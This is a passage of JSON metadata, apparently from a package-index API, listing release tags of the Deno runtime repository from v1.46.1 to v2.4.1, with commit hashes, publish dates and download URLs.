,{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-